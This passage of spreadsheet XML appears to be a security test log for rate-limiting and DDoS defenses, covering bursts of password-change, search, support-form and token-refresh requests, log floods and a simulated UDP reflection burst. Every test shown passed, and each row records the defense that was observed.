      </c>
      <c r="F305" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G305" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H305" s="16" t="inlineStr">
        <is>
          <t>Non-critical analytics backgrounded; Core authentication and donation APIs remain responsive</t>
        </is>
      </c>
    </row>
    <row r="306" ht="22" customHeight="1">
      <c r="A306" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-025</t>
        </is>
      </c>
      <c r="B306" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C306" s="16" t="inlineStr">
        <is>
          <t>Audit Logging Rate Limit &amp; Buffer Protection</t>
        </is>
      </c>
      <c r="D306" s="16" t="inlineStr">
        <is>
          <t>Generate 10,000 log events per second</t>
        </is>
      </c>
      <c r="E306" s="16" t="inlineStr">
        <is>
          <t>Log flood attack</t>
        </is>
      </c>
      <c r="F306" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G306" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H306" s="16" t="inlineStr">
        <is>
          <t>Asynchronous log buffer flushes gracefully without causing memory leak / I/O block</t>
        </is>
      </c>
    </row>
    <row r="307" ht="22" customHeight="1">
      <c r="A307" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-026</t>
        </is>
      </c>
      <c r="B307" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C307" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting on Password Change Endpoint</t>
        </is>
      </c>
      <c r="D307" s="16" t="inlineStr">
        <is>
          <t>Send 20 password change requests in 30 seconds</t>
        </is>
      </c>
      <c r="E307" s="16" t="inlineStr">
        <is>
          <t>Password change burst</t>
        </is>
      </c>
      <c r="F307" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G307" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H307" s="16" t="inlineStr">
        <is>
          <t>Strict rate limit enforced (max 3 req/min); 429 Too Many Requests</t>
        </is>
      </c>
    </row>
    <row r="308" ht="22" customHeight="1">
      <c r="A308" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-027</t>
        </is>
      </c>
      <c r="B308" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C308" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting on Search API Endpoint</t>
        </is>
      </c>
      <c r="D308" s="16" t="inlineStr">
        <is>
          <t>Send 300 search requests per minute</t>
        </is>
      </c>
      <c r="E308" s="16" t="inlineStr">
        <is>
          <t>Search API burst</t>
        </is>
      </c>
      <c r="F308" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G308" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H308" s="16" t="inlineStr">
        <is>
          <t>Rate limit throttles search queries (max 60 req/min)</t>
        </is>
      </c>
    </row>
    <row r="309" ht="22" customHeight="1">
      <c r="A309" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-028</t>
        </is>
      </c>
      <c r="B309" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C309" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting on Contact Support Form</t>
        </is>
      </c>
      <c r="D309" s="16" t="inlineStr">
        <is>
          <t>Send 50 contact form submissions in 1 minute</t>
        </is>
      </c>
      <c r="E309" s="16" t="inlineStr">
        <is>
          <t>Support form spam</t>
        </is>
      </c>
      <c r="F309" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G309" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H309" s="16" t="inlineStr">
        <is>
          <t>Form submission rate capped at 2 req/min with CAPTCHA requirement</t>
        </is>
      </c>
    </row>
    <row r="310" ht="22" customHeight="1">
      <c r="A310" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-029</t>
        </is>
      </c>
      <c r="B310" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C310" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting on Token Refresh Endpoint</t>
        </is>
      </c>
      <c r="D310" s="16" t="inlineStr">
        <is>
          <t>Send 100 token refresh calls in 10 seconds</t>
        </is>
      </c>
      <c r="E310" s="16" t="inlineStr">
        <is>
          <t>Token refresh burst</t>
        </is>
      </c>
      <c r="F310" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G310" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H310" s="16" t="inlineStr">
        <is>
          <t>Refresh token endpoint limited to 10 req/min per user session</t>
        </is>
      </c>
    </row>
    <row r="311" ht="22" customHeight="1">
      <c r="A311" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-030</t>
        </is>
      </c>
      <c r="B311" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C311" s="16" t="inlineStr">
        <is>
          <t>DDoS Defense - UDP Amplification Protection</t>
        </is>
      </c>
      <c r="D311" s="16" t="inlineStr">
        <is>
          <t>Simulate UDP reflection traffic burst to server IP</t>
        </is>
      </c>
      <c r="E311" s="16" t="inlineStr">
        <is>
          <t>UDP flood simulation</t>
        </is>
      </c>
      <c r="F311" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G311" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H311" s="16" t="inlineStr">
        <is>
          <t>Firewall drops incoming unrequested UDP packets at network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2026-07-28T08:41:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-28T08:41:40Z</dcterms:modified>
</cp:coreProperties>
</file>